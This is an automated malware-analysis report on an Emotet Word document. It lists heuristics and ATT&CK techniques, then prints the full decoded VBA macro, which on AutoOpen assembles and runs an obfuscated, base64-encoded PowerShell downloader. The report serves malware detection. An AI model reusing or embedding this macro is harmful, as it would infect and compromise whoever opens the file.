Verdict: MALICIOUS (Risk Score: 210)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1059 Command and Scripting Interpreter
The sample contains legacy WordBasic auto-execution markers, and a critical heuristic fires on a Shell() call inside the VBA, indicating that it is designed to execute external commands. ClamAV identifies it as Emotet, a known downloader family. The Autoopen macro triggers the Shell() call, which is the primary mechanism for delivering a secondary payload. The command string handed to Shell() is not present in plain form: it is assembled at run time from concatenated fragments returned by several helper functions, with junk arithmetic loops interleaved to pad the source, so the decoded macro has to be read as a whole to recover the command.
Heuristics (7)

- ClamAV: Doc.Downloader.Emotet-6899214-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6899214-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA. Matched line in script (with adjacent lines):
    Next
    fSODOmNMk = ivMiR + Shell(RGWiMLSrDPl + Chr(AiknkvBZ + vbKeyP + KwDLjItFSJJ) + "owers" + WBUzimvvWWf + HwHznw + NiSjqWaKi + SdkMMcMi + sMJKiRLCHEQ, 17641 - 17641)
    For uwMYLz = OGUFF To BcWSLq
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script (with adjacent lines):
    End Function
    Sub Autoopen()
    On Error Resume Next
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12519 bytes | a73e5f7f56b9b6ca5300ddc9d33ca2961a935f0bccbc2c913cb8364fed73fe45 |

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "foNiJLsQr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function fSODOmNMk()
On Error Resume Next
For qfbsO = aVEAE To QrZTPP
For qLwNi = lEGdv To 86061
jBfuKJ = (1660 / CBool(wzFzE) - pjwOp / Oct(51823 / Hex(85569) / CrSsi + Rnd(QTrJIS / Fix(37))))
Next
OLiIF = 28652 - 24599
Next
For NtPipw = IPGRt To zocRb
For mcGwp = PaUTFj To 23178
XowCOs = (63149 / CBool(LbCqZq) - XCqdr / Oct(49922 / Hex(34896) / wasZV + Rnd(oJWFN / Fix(37))))
Next
KqaDiq = 88191 - 32405
Next
fSODOmNMk = ivMiR + Shell(RGWiMLSrDPl + Chr(AiknkvBZ + vbKeyP + KwDLjItFSJJ) + "owers" + WBUzimvvWWf + HwHznw + NiSjqWaKi + SdkMMcMi + sMJKiRLCHEQ, 17641 - 17641)
For uwMYLz = OGUFF To BcWSLq
For RfkLA = jbnvA To 61731
cCbfB = (20271 / CBool(XvQkI) - dozjPf / Oct(6563 / Hex(88269) / OOAYG + Rnd(paKUZ / Fix(37))))
Next
FzAqR = 1268 - 72813
Next
End Function
Sub Autoopen()
On Error Resume Next
For WPzDPb = iHfUcH To nNfcE
For hUFQij = pzpzf To 33750
pwOzJf = (50508 / CBool(TiAww) - LnLpww / Oct(34425 / Hex(5079) / jViDC + Rnd(RipLNZ / Fix(37))))
Next
wiSZMW = 1552 - 52369
Next
fSODOmNMk
For ljhdJ = IiScnp To bbbYiC
For KljRXp = WXmvBi To 37475
wWZXmZ = (13339 / CBool(klzTGr) - orwiFz / Oct(125 / Hex(31548) / UBlLj + Rnd(lGLscF / Fix(37))))
Next
HPWDtw = 60134 - 44708
Next
End Sub
Attribute VB_Name = "WiZzDDDOkw"
Function WBUzimvvWWf()
On Error Resume Next
For PLBOYM = UkZGQ To YEKaR
For bWAuj = kzKiPl To 53753
cpEQw = (56153 / CBool(jFzEz) - zTQlv / Oct(46621 / Hex(35294) / TPQRan + Rnd(ApUni / Fix(37))))
Next
jjzui = 77618 - 16584
Next
buSHckDu = "HeLL -e IAAuACg" + "AKABnAGUA" + "VAAtAFYAQQ" + "ByAEkAYQBiAEwAZ" + "QAgACcAKg" + "BtA" + "EQAcgAqACcA" + "KQAuAE4AYQBNAGU" + "AWwAzA"
For RBqlfk = usUNJJ To ZnwWp
For fPiQTz = jRrRj To 18717
COaju = (5755 / CBool(GwAZUA) - JLvIwS / Oct(30617 / Hex(2514) / aRfUu + Rnd(BCdzFF / Fix(37))))
Next
NRbmF = 48193 - 37018
Next
JZuFw = "CwAMQAxACwAMgBd" + "AC0ASgBvAGkA" + "bgAnACc" + "AKQAoAG4ARQ"
For qzzpaF = JlrnBr To POiqd
For zwUuVw = djMMqi To 87585
SjiUXF = (87587 / CBool(ISEUNC) - DPvXf / Oct(89211 / Hex(58565) / TcHSc + Rnd(iwTzQ / Fix(37))))
Next
iEWFqE = 6539 - 23374
Next
RwZzjtBObYt = "BX" + "AC0AT" + "wBiAEoARQBDAH" + "QAIABJAG8AL" + "gBDAG8AbQBwAF" + "IARQBTAHM" + "ASQ" + "BPAG4ALgBEAEUA" + "RgBMAEEAdABlAFM"
For RdkbTI = vKOpnb To rPmQT
For VkWwFi = sphbqS To 55661
wXqJQ = (62379 / CBool(JjbJG) - iqDnjh / Oct(12292 / Hex(62656) / oWpJF + Rnd(dmwVw / Fix(37))))
Next
tsvHC = 95823 - 39025
Next
MEdnBRO = "AVAB" + "yAEUAYQ" + "Bt" + "ACgAW"
For mUvXFO = dnHkWV To iUUHbw
For wdoIlk = HjhkmE To 40678
aRDqF = (99702 / CBool(rlbmDJ) - nuWXvp / Oct(82943 / Hex(14441) / UiCVH + Rnd(AkRVOt / Fix(37))))
Next
Ekqfz = 73952 - 5927
Next
zZcVBRX = "wBzAHk" + "AcwBUA" + "EUATQAu" + "AG" + "kAbwAu" + "AG0ARQBNAE8Acg"
For zhnjsm = OIfcT To jMDir
For krVhu = kqlhQr To 8997
iVwOo = (27992 / CBool(mWIpma) - VYnBF / Oct(41264 / Hex(35428) / dzswIv + Rnd(jsnXOT / Fix(37))))
Next
Pppdd = 96028 - 40538
Next
wcBwiNaWcV = "BZA" + "FMAdAByAEU" + "AYQBNAF0AWwB" + "DAG8AbgB2" + "AGUAUgBUAF0AOg" + "A6AEYAcgBvAE" + "0AYgBBAF" + "MARQA2ADQAcw" + "B0"
For rIHjV = tOmjm To rzVpGs
For pPBOL = HIwLcs To 39400
RHkrY = (50978 / CBool(niBoc) - WSTzX / Oct(70715 / Hex(75648) / zpuvCN + Rnd(vCJqR / Fix(37))))
Next
Zplzh = 34241 - 91240
Next
tNqcK = "AHIASQBOAEcA" + "KAAgACcAVgBaAE" + "QAYg" + "BUAHMASgBB"
For lAZiH = qiMFHh To TRpwWM
For sbrzL = wdiBp To 36481
dMpVMu = (55422 / CBool(QqEjk) - GXvBLE / Oct(69998 / Hex(18788) / IbXHo + Rnd(vKPop / Fix(37))))
Next
HbUjb = 69432 - 94683
Next
wpFzKRfMK = "AE" + "UASQBaA" + "GYAWgBT" + "ACsAYQBsAEUAY" + "gBaAFEAbwBvAG4" + "ARwBoA" + "E8AQwBpAE0" + "AUQBFAG8AMQBSA" + "E8Ae"
For lnOaOq = nAiOH To Chtom
For AUfpuv = wvaRjU To 75314
YVMwsz = (14678 / CBool(Klahq) - ubvov / Oct(93367 / Hex(13120) / wUfos + Rnd(MiutU / Fix(37))))
Next
iMjsur = 86644 - 23000
Next
ISkCjFoqsq = "ABzAFIAcwBsADQA" + "Rg" + "BkADIAT" + "wA3AF"
For DUNks = zWuZq To SXsQEF
For wbrhNE = iuCuDD To 90120
uASEzI = (24009 / CBool(zTdKM) - nbpmvP / Oct(87637 / Hex(23671) / zfSSFT + Rnd(Vnjhc / Fix(37))))
Next
wAFpkP = 83880 - 25785
Next
TiILo = "cAZABtAFEANQBoA" + "EgAZQ" + "AzAEkAbQBDADg" + "AbQBXAF" + "QAbQAvACs" + "AYgAw" + "AE8AKwBwAHo" + "AMQBGADYAUQBX" + "ADYATA"
WBUzimvvWWf = buSHckDu + JZuFw + RwZzjtBObYt + MEdnBRO + zZcVBRX + wcBwiNaWcV + tNqcK + wpFzKRfMK + ISkCjFoqsq + TiILo
End Function
Function HwHznw()
On Error Resume Next
For uOtGbE = IfqiN To YhqHs
For wqdiMv = pjGfdU To 48879
kDZws = (92465 / CBool(iBqtf) - bYwcXs / Oct(29157 / Hex(86754) / jjLwO + Rnd(CzNNnC / Fix(37))))
Next
dQIzCu = 22598 - 55191
Next
JSVFCzbdnwF = "BC" + "AGwAa" + "wAwADgAQgA0A" + "DQAawBZADMAcABp" + "AGsAdABEAHAAYgB" + "6AGEAOQ" + "AvAG4AOABwAF"
For SPzOIH = GcKXU To snuhT
For Bdjrdn = iUXpUh To 76696
NvBAcu = (95057 / CBool(ldfTK) - UFVai / Oct(52946 / Hex(19482) / XTaNZh + Rnd(mppjXi / Fix(37))))
Next
thrhDX = 89813 - 27419
Next
IErrqiXAVn = "cA" + "dQB" + "jAE" + "kA" + "QwBYADAAQwBw" + "AEUATwBJADcANQB" + "RAEUAagBhAEcAe" + "gBhAFMALwB0AHo" + "AdwB4AFg" + "ASQBLAFo"
For TkKzSU = wMlbXh To OVPXz
For pnmtdM = jBXmrJ To 41075
dOiQS = (90577 / CBool(UlDTLH) - LozvZI / Oct(62935 / Hex(95846) / WFfKz + Rnd(zjOMSk / Fix(37))))
Next
hGjtw = 36619 - 1710
Next
SwFhh = "AMQAzADAAOQB" + "nAEkAcABsAG0" + "AcwBWAEYAeQBLAF" + "IAbgBsAEoAdgBHA" + "EQAYwBUAFUA" + "SQBtAHQAZgBQ" + "AFQA" + "YgA5AHgAZwB" + "CAFQAVABzAHg" + "AdwB"
For JAjGpj = wjMafz To Kmkuf
For UFzpsF = sOjKN To 94142
NFzDIE = (22560 / CBool(izrEJW) - uIEnOV / Oct(7487 / Hex(2434) / OkcuhC + Rnd(MiWzF / Fix(37))))
Next
hmaaja = 99906 - 95737
Next
XPHEVHfYs = "6AHgAbgBBAFAAa" + "gBCAGYAeABi" + "AE4Ac" + "gA1AHEAbAB" + "5AGQAZwBN" + "AFIATQBXAEEAe" + "gBLADcATwBWA" + "DAAYgBS" + "ADY"
For wkwUYG = iGJDIo To cRFcz
For WmYqHb = MnodB To 86509
nswMiv = (73996 / CBool(PoBis) - wJawC / Oct(35718 / Hex(33022) / MGNwo + Rnd(vSjCP / Fix(37))))
Next
kjStz = 3904 - 86029
Next
QrjEHjN = "AbQ" + "A4ADQAVwA5AE8AY" + "wBsAFcA" + "YQBwA"
For Xkocj = OdNiw To Kijszh
For ZEzHz = iiOrh To 1486
ZvmbR = (71174 / CBool(kwREB) - pDFDa / Oct(88107 / Hex(31355) / TRZcoN + Rnd(ZAmfi / Fix(37))))
Next
APsEaO = 37473 - 42919
Next
hLIzJjhPXFh = "GkA" + "cQB" + "OAGQAVwBBAGYA" + "cAB5AC8AUABTAG" + "EAVgA5A" + "HAAOQBtA" + "Ew"
For msGvZb = KQokF To iMzcX
For KwfZX = onMzA To 60654
YsijWt = (76654 / CBool(BpVrtt) - lfEzqJ / Oct(22413 / Hex(53597) / Sjqln + Rnd(KQInj / Fix(37))))
Next
zfdjj = 64644 - 18053
Next
jmVbscdjkZ = "AWgAwAG" + "IAawB5AGgAbQBJ" + "AGEAWgA4ADQAMw" + "Bj" + "AHUAQgBCA"
For JidMu = huCon To RWNmC
For opiFi = Mjlzb To 27574
cCSzk = (10077 / CBool(qliQOT) - TwdRq / Oct(63475 / Hex(63070) / TiEzXz + Rnd(RhTnh / Fix(37))))
Next
KwYdh = 46027 - 23232
Next
BZBiWa = "E0AUgBIADcAWgA" + "4AGwAMABhAHAA" + "awBsAG" + "gAeQBHA" + "DYANABYA" + "E8AbABhAD" + "gAVwB" + "KAEU"
For LOrOF = kIhkha To intlhf
For Twwamp = zEoIJ To 39845
IQNkSG = (55320 / CBool(zjGGc) - KisAsi / Oct(68803 / Hex(28030) / QcQkm + Rnd(tbYFs / Fix(37))))
Next
XjAPY = 894 - 19281
Next
wYwzqdjEmIG = "AVQB" + "wAHoAdAA3AEgAN" + "ABwAGgA" + "SwB5AHgAVgB6AD" + "AAbgB0AE0" + "AZwBnAHE" + "AdABRAEkAWQBqAH"
For NTfMjn = wIQlG To wwICVp
For GHiBj = nwrlT To 66136
REwwD = (8834 / CBool(iwTHTm) - ZksMDK / Oct(8132 / Hex(80723) / liddz + Rnd(FXwDjc / Fix(37))))
Next
zLzQpb = 19949 - 76128
Next
LmfjTBb = "cAWg" + "BQAEEALwB" + "zAEQAZwBGADcA" + "VwBpADk" + "AOQBUAGMA" + "awBiAGM" + "AZAA3AGUA" + "SQB4ACsAWQBpA" + "HAANwBBAEMATg" + "A1AHkAYQBEAEI"
HwHznw = JSVFCzbdnwF + IErrqiXAVn + SwFhh + XPHEVHfYs + QrjEHjN + hLIzJjhPXFh + jmVbscdjkZ + BZBiWa + wYwzqdjEmIG + LmfjTBb
End Function
Function NiSjqWaKi()
On Error Resume Next
For hzWOOz = QXVbw To SZazC
For wLQFDf = hNmUcf To 35691
zfGlN = (11512 / CBool(jfLAup) - ZppYTr / Oct(28393 / Hex(32441) / SiiRKd + Rnd(twjzV / Fix(37))))
Next
UOplzf = 70499 - 89952
Next
wdtmAwfnbU = "AZwBYAEoAYQBmA" + "GIARQAzADMAWg" + "BJADE" + "ASwBUAFgAMgB"
For kvoow = DMbwjo To DionCc
For EOpWf = bjhtj To 61941
PzjdWh = (46578 / CBool(jECpFf) - GzJdH / Oct(55382 / Hex(98304) / FRJaC + Rnd(ihNzr / Fix(37))))
Next
GzKRU = 8792 - 54712
Next
psruI = "1ADgATABXAGI" + "Ac" + "gA3AGEAKwBmA" + "HQAR" + "wB" + "XAHMAVgBvA"
For JmhZp = ckjFY To QbdLN
For VVEWp = OHEHms To 16829
AiMTk = (68586 / CBool(lsuwHb) - HiWzD / Oct(26939 / Hex(67571) / PmzrL + Rnd(NVwqzV / Fix(37))))
Next
lOKad = 42290 - 69456
Next
LQjKnN = "FoATgAyAGwATABC" + "AEUAYQB" + "XA" + "HYASgBzAEoA" + "TQA2AGwAb" + "gBKAE8AeQBl" + "AEgA" + "bg"
For KYhNrz = lmouU To OZVsYC
For WwHKG = WQLZa To 84649
dFOPdT = (67059 / CBool(jLBCAa) - pohFT / Oct(22736 / Hex(12035) / QXHnd + Rnd(ZNOCV / Fix(37))))
Next
JLGPE = 37322 - 70963
Next
zohiPJmt = "BWADQ" + "AWQBJAGMAdQB" + "3AC8ASgB3AFoAR" + "ABuAGw" + "AKwBMAEkAZAB4A" + "HMAVwBRA" + "FIANwBqAGgARA"
For kFIFdw = WrUYnX To zrWjFd
For wmzfL = ihSAA To 51773
dLOBK = (58871 / CBool(CWtihr) - NOsYO / Oct(13698 / Hex(55376) / SIZRlw + Rnd(YUXMEN / Fix(37))))
Next
cUWauH = 53953 - 86581
Next
vlNzzlhiToB = "BMAHIAWQAyAGsA" + "dwB" + "oAGwAWQB" + "YAEkAawB6" + "AGc" + "AZQA5AF"
NiSjqWaKi = wdtmAwfnbU + psruI + LQjKnN + zohiPJmt + vlNzzlhiToB
End Function
Function SdkMMcMi()
On Error Resume Next
For zTvQT = cmTqqs To bstmN
For ZGVmEb = XBnMVK To 49546
czpfVw = (85349 / CBool(sOXuWt) - hItiTO / Oct(54046 / Hex(63633) / phCawH + Rnd(jSSzu / Fix(37))))
Next
HrzhU = 56140 - 47467
Next
izaZjEAo = "gAMwBGAEkAVQBSA" + "HAATgB1AD" + "AAVQBIAG0" + "AMABHADQA" + "MgAzADAARAAn"
For jPiYFE = fGYAQw To ovSmks
For bEtidB = fmuwI To 20217
SXBsD = (88338 / CBool(MtziF) - DDOhs / Oct(60940 / Hex(80577) / LkpcD + Rnd(ATiBI / Fix(37))))
Next
jWXQuh = 98188 - 82263
Next
aChKBju = "AC" + "kAIAAsAF" + "sAaQBvA" + "C4AQwBvAG0AcA" + "BSAGUAUwBz" + "AGkAbwBOAC4A" + "QwBPAG0A"
For KuEYj = cXMGcU To HnMQA
For zsOwV = khfwn To 20431
zqAqkD = (37465 / CBool(YvSufT) - PkEdhi / Oct(82718 / Hex(42654) / wiGzRw + Rnd(YwwVM / Fix(37))))
Next
wbMjt = 52939 - 94379
Next
NOAfwaRGWsj = "UAByAEUAcwBTAE" + "kA" + "bwBOAE0ATwBk" + "AGUAXQA6" + "ADo"
For DqwGRu = KdCIUF To BzUJbW
For wjzQJo = QAkPZw To 85753
IszCiO = (36019 / CBool(NsACZP) - kAaCF / Oct(13224 / Hex(1600) / IGRtcR + Rnd(vGBJpc / Fix(37))))
Next
Yrffp = 69776 - 46566
Next
zLHzOnM = "ARABFAEMAbwBNA" + "FAAUgBlAFMAcw" + "ApACA" + "AfABGAE8" + "AcgBlAEEA" + "YwB" + "IAC0ATwBCAGoAZ" + "QBDAFQAew"
SdkMMcMi = izaZjEAo + aChKBju + NOAfwaRGWsj + zLHzOnM
End Function
Function sMJKiRLCHEQ()
On Error Resume Next
For mCBoA = wwnlH To qwMUp
For UztAQa = abiWZR To 31823
AUPro = (33975 / CBool(wKOXha) - ciLpN / Oct(29869 / Hex(51581) / lmbDZ + Rnd(PZNUqk / Fix(37))))
Next
czcAKr = 1427 - 67091
Next
unijiEjh = "AgAG4ARQBXAC0AT" + "wBiAEoARQBDA" + "HQAIAAgAFMAeQBT" + "AFQAZQBNAC4ASQ" + "BPAC4AcwB0AHIAR" + "QBhAG"
For ssJGwE = jDBrk To cQkrph
For ADqqdA = ioDYaj To 98553
iuTpLO = (58184 / CBool(psFtV) - PSCTw / Oct(72696 / Hex(78050) / TdwXc + Rnd(AcREjh / Fix(37))))
Next
qYAVWW = 75026 - 2220
Next
LpYvsz = "0AcgBFAGEA" + "ZABlAHIAKAAkAF8" + "ALAB" + "bAFQARQB4AFQALg" + "BlAE4AQwBvAGQA" + "SQBOAEcA" + "XQA" + "6ADoAYQBzAGMA" + "SQBpACkAfQ"
For XGLWYk = GiNGh To pqnljP
For bBKoi = tBzcP To 3030
VFrMG = (41721 / CBool(GKVVb) - PiJhk / Oct(74214 / Hex(44707) / VWwWrz + Rnd(UIGzEh / Fix(37))))
Next
kzbiN = 98877 - 11773
Next
oVmvzuT = "AgACkALgBSAG" + "UAQQBkAFQA" + "bwBFAG4A" + "ZAA" + "oACk" + "AIAA="
sMJKiRLCHEQ = unijiEjh + LpYvsz + oVmvzuT
End Function